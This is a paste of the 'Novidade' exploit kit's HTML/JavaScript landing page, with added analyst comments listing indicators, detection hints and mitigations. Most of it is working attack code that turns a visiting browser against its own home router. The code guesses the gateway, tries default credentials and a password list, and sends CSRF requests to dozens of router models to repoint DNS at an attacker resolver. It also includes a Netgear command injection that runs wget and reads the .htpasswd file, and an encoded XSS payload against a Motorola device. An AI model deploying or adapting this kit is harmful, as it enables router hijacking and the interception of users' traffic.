
Novidade Exploit Kit

a guest
Dec 10th, 2019
  1. <html><head><script type="text/javascript" src="e_x.js"></script></head>
  2. <body>
  3. <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
  4. <script language="javascript">
  5.  
  // Campaign configuration for this sample; the values below are the main indicators on the page.
  // `evil` URL-decodes to "192.168.0.1" followed by a stray "%". Nothing in this inline script
  // reads it; it may be consumed by e_x.js, which is not shown here.
  6. var evil = "%31%39%32%2E%31%36%38%2E%30%2E%31%";
  // IoC: resolver address that the requests below try to write into router DNS settings.
  // A router or DHCP lease handing out this address as DNS should be treated as tampered with.
  7. var pDNS = "37.139.50.45";
  // Secondary resolver written alongside pDNS.
  8. var sDNS = "8.8.8.8";
  // Passwords tried with the "admin" user in srq(); "<eopl>" is a sentinel that exp() looks for in the URL.
  9. var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","<eopl>"];
  // Delays in milliseconds before exp() calls window.stop(): gstp on the GET path, pstp on the POST path.
  10. var gstp=400;
  11. var pstp=5000;
  // exp(url, data, method): sends one blind cross-site request from the visitor's browser to a
  // device's web admin interface. The response is never read; only the side effect of the
  // request matters, which makes this a cross-site request forgery (CSRF) primitive.
  //   method "GET"  - the URL is loaded as a CSS @import, with a random `ju` parameter appended.
  //   anything else - `data` ("k=v&k=v") becomes text inputs of a form built inside a 1px iframe,
  //                   and the form is submitted to `url` with the given method.
  // Defensive relevance: such requests only take effect where the admin interface accepts
  // state-changing requests without an anti-CSRF token and with default or guessable credentials.
  12. function exp(url, data, method){
  13. if(method=="GET"){
  14. document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
  // Once the URL carrying the "<eopl>" sentinel has been issued, stop further page loading after gstp ms.
  15. if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
  16. }
  17. else{
  18. document.write('<body></body>');
  19. var ifrm = document.createElement('IFRAME');
  20. ifrm.height="1px";
  21. ifrm.width="1px";
  22. document.body.appendChild(ifrm);
  23.  
  24. var f=ifrm.contentWindow.document.createElement('FORM');
  25. f.name='f';
  26. f.method=method;
  27. f.action=url;
  // Each "name=value" pair of `data` becomes one form input.
  28. var el=data.split('&');
  29. for(i=0;i<el.length;i++)
  30. {
  31. var e=el[i].split('=');
  32. var t=ifrm.contentWindow.document.createElement('INPUT');
  33. t.type='TEXT';
  34. t.id=e[0];
  35. t.name=e[0];
  36. t.value=e[1];
  37. f.appendChild(t);
  38. }
  39. ifrm.contentWindow.document.body.appendChild(f);
  40. f.submit();
  // The POST path always schedules window.stop(), after pstp ms.
  41. var tm=setTimeout(function(){window.stop();},pstp);
  42. }
  43. }
  // srq(ip): password-guessing pass against a single endpoint, /userRpm/WanDynamicIpCfgRpm.htm
  // (the hostName parameter in the request reads TL-WR941ND).
  // Issues 12 GET requests through exp(), one per passlist entry, each embedding
  // "admin:<password>@" in the URL and setting dnsserver/dnsserver2 to pDNS/sDNS.
  // Detection: a LAN client producing a rapid burst of authenticated requests to this path with
  // changing credentials; on the device, repeated failed admin logins followed by a DNS change.
  44. function srq(ip) {
  45. for(i=0;i<12;i++){
  46.  
  47. var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
  48. var method = "GET";
  49. url = url1.replace("$1$","");
  // "$1$" in the template is the slot for the credentials; the assignment above is overwritten below.
  50. var cred="admin";
  51. if(passlist[i]!="")
  52. cred=cred+":"+passlist[i];
  53. cred = cred+"@";
  54. url = url1.replace("$1$",cred);
  55. exp(url, "", method);
  56. }
  57.  
  58. }
  // e_belkin(ip): two-step attempt against /cgi-bin/login.exe and /cgi-bin/setup_dns.exe
  // (the function name suggests Belkin devices; the page gives no other vendor evidence).
  // Step 1 sends a GET login with the password "admin"; step 2 POSTs the octets of pDNS and
  // sDNS as separate dns1_* / dns2_* fields with auto_from_isp=0.
  // Detection: these two paths requested back to back by a browser on the LAN that is not
  // showing the router's admin page.
  59. function e_belkin(ip)
  60. {
  61. var method = "POST";
  62. var url = "";
  63. var data ="";
  64.  
  65. url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
  66. exp(url, "", "GET");
  67.  
  68. url="http://"+ip+"/cgi-bin/setup_dns.exe";
  69. data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
  70. exp(url, data, method);
  71. }
  72.  
  // e_webcam(ip): two POSTs to /cgi-bin/webcm. The first submits a login with admin/admin,
  // the second submits resolver:settings/nameserver1 and nameserver2 set to pDNS and sDNS.
  // Which product family exposes /cgi-bin/webcm is not stated on the page.
  // Detection: POSTs to /cgi-bin/webcm containing "resolver:settings/nameserver" parameters
  // that do not originate from the device's own admin page.
  73. function e_webcam(ip)
  74. {
  75. var method = "POST";
  76. var url = "";
  77. var data ="";
  78.  
  79. url="http://"+ip+"/cgi-bin/webcm";
  80. data="getpage=../html/home.htm&errorpage=../html/index.html&login:command/username=admin&login:command/password=admin&var:errormsg=Error";
  81. exp(url, data, method);
  82.  
  83. url="http://"+ip+"/cgi-bin/webcm";
  84. data="getpage=../html/setup/dns.htm&resolver:settings/nameserver1="+pDNS+"&resolver:settings/nameserver2="+sDNS+"&dproxy:settings/state=2";
  85. exp(url, data, method);
  86. }
  87.  
  88.  
  // p_exp(ip): the POST-based pass. Runs e_belkin() and e_webcam(), then submits five more
  // forms through exp(): /apply.cgi and /apply.cgi?/BAS_update.htm (both with admin:admin in
  // the URL), /goform/AdvSetDns, /login.cgi (user "admin", empty password) and /h_wan_fix.cgi.
  // All but the login request carry pDNS/sDNS as the new DNS servers.
  // Additional indicator: the first form also hard-codes lan_dns0_0..3 = 217.12.208.38, an
  // address that differs from pDNS and appears nowhere else on the page.
  89. function p_exp(ip) {
  90. e_belkin(ip);
  91. e_webcam(ip);
  92.  
  93. var method = "POST";
  94. var url = "";
  95. var data ="";
  96.  
  97. url = "http://admin:admin@"+ip+"/apply.cgi";
  98. data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
  99. exp(url, data, method);
  100.  
  101. url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
  102. data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
  103. exp(url, data, method);
  104.  
  105. url="http://"+ip+"/goform/AdvSetDns";
  106. data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
  107. exp(url, data, method); /*Unicorn WB-3300NR*/
  108.  
  // Login attempt with an empty password, sent before the DNS form that follows it.
  109. url="http://"+ip+"/login.cgi";
  110. data="login_name=admin&login_pass=";
  111. exp(url, data, method);
  112.  
  113. url="http://"+ip+"/h_wan_fix.cgi";
  114. data="static_dns1="+pDNS+"&static_dns2="+sDNS;
  115. exp(url, data, method);
  116.  
  117. }
  118.  
  // e_moto(ip): variant that uses <img> elements instead of exp() to issue two GET requests.
  // The first submits userId=admin / password=motorola to /frames.asp. The second calls
  // /goformFOO/AlFrame with URL-encoded JavaScript placed in the
  // Gateway.VirtualServerAdvConfig.serverId.entry field. If the device's admin page renders
  // that field unescaped (not verifiable from this page), the script would re-submit the WAN
  // settings with Gateway.Wan.dnsAddress1 set to pDNS.
  // Detection: requests to /goformFOO/AlFrame whose parameters contain "window.onload" or
  // "createElement"; remediation on an affected device includes removing the injected
  // virtual-server entry as well as restoring the DNS setting.
  119. function e_moto(ip)
  120. {
  // The block comment below is an earlier, disabled version of the same attempt.
  121. /*var method = "GET";
  122. var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
  123. exp(url, "", method);
  124.  
  125. url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
  126. exp(url, "", POST); */
  127. var i1 = document.createElement('IMG');
  128. document.body.appendChild(i1);
  129. var i2 = document.createElement('IMG');
  130. document.body.appendChild(i2);
  131. i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
  132. i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
  133.  
  134. }/*Motorola*/
  135.  
  // r_exp(ip): main dispatcher, called once a likely gateway address has been chosen.
  // Sends a long series of blind GET requests through exp(), each shaped for a different
  // router admin interface. The vendor hints are the author's trailing comments (DGN 1000 /
  // DGN2200, asus rt n66u / n56u, Philips, Motorola SBG901, DI 604). The requests try to set
  // the device's DNS servers to pDNS/sDNS, many with default credentials embedded in the URL
  // (admin:admin, admin:password, Admin:1234, user:user, root:root).
  // After the GET series it schedules p_exp(ip) one second later and runs srq(ip) and
  // e_moto(ip) immediately.
  // Mitigation: change default admin credentials, keep router firmware current, and monitor
  // the router's configured DNS servers for unexpected changes.
  136. function r_exp(ip) {
  137.  
  138. var method = "GET";
  139. var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
  140. //exp(url, "", method);
  141.  
  // Unlike the requests after it, this one passes a shell command line to setup.cgi
  // (todo=syscmd) rather than a settings form; the command reads /www/.htpasswd and uses the
  // result as credentials for the DNS change.
  142. url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1";
  143. exp(url, "", method); /*DGN 1000/DGN2200*/
  144.  
  145. url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
  146. exp(url, "", method); /*asus rt n66u*/
  147.  
  148. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
  149. exp(url, "", method); /*asus rt n56u*/
  150.  
  151. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
  152. exp(url, "", method); /*asus rt n56u*/
  153.  
  154. url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
  155. exp(url, "", method);/*asus nt-12*/
  156.  
  157. url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
  158. exp(url, "", method);
  159.  
  160. url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  161. exp(url, "", method);
  162.  
  163. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  164. exp(url, "", method); /*Philips*/
  165.  
  166. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  167. exp(url, "", method);/*Motorola SBG901*/
  168.  
  169. url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
  170. exp(url, "", method);
  171.  
  172. url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
  173. exp(url, "", method);
  174.  
  175. url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
  176. exp(url, "", method);
  177.  
  178. url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  179. exp(url, "", method);
  180.  
  181. url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  182. exp(url, "", method);
  183.  
  184. url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  185. exp(url, "", method);
  186.  
  187. url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  188. exp(url, "", method);
  189.  
  190. url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  191. exp(url, "", method);
  192.  
  193. url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  194. exp(url, "", method);
  195.  
  196. url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
  197. exp(url, "", method);
  198.  
  199. url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
  200. exp(url, "", method);
  201.  
  202. url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
  203. exp(url, "", method);
  204.  
  205. url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
  206. exp(url, "", method);
  207.  
  208. url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
  209. exp(url, "", method);
  210.  
  211. url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
  212. exp(url, "", method);
  213.  
  214. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
  215. exp(url, "", method);
  216.  
  217. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
  218. exp(url, "", method);
  219.  
  220. url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
  221. exp(url, "", method);
  222.  
  223. url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
  224. exp(url, "", method); /*DI 604*/
  225.  
  226.  
  // Hand over to the other passes: POST variants after one second, then the
  // password-guessing pass and the <img>-based variant straight away.
  227. var t=setTimeout(function(){p_exp(ip);},1000);
  228. srq(ip);
  229. e_moto(ip);
  230. }
  // Entry point of the inline script.
  // is_chrome holds the index of "chrome" in the user agent (-1 when absent); only the
  // commented-out redirect on the next line refers to it.
  231. var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
  232. //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
  233.  
  // getIPs is not defined in this script; presumably it comes from e_x.js (loaded in <head>)
  // and reports the visitor's local IP addresses - confirm against that file.
  // For each address in a private or link-local range (192.168/16, 169.254/16, 10/8,
  // 172.16-31) the callback guesses the gateway as x.y.z.1 and calls r_exp() only if that
  // guess appears in `gw`. Because the guess always ends in ".1", only list entries ending
  // in ".1" can match.
  // Defensive takeaway: everything runs from a web page the victim merely visits; no inbound
  // access to the router from the internet is required.
  234. getIPs(function(ip) {
  235. if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
  236. var gw = ["192.168.1.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
  237. var sip = ip.split(".");
  238. ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
  239. var i = 0;
  240. var j = 0;
  241. for (i = 0; i < gw.length; i++) {
  242. if (ip == gw[i]) {
  243. j = j + 1;
  244. break;
  245. }
  246. };
  247. i = i + 1;
  // j > 0 means the guessed gateway address was found in the list above.
  248. if (j > 0) {
  249. r_exp(ip);
  250. };
  251. }
  252. });
  253.  
  254. </script>
  255. </body>
  256. </html>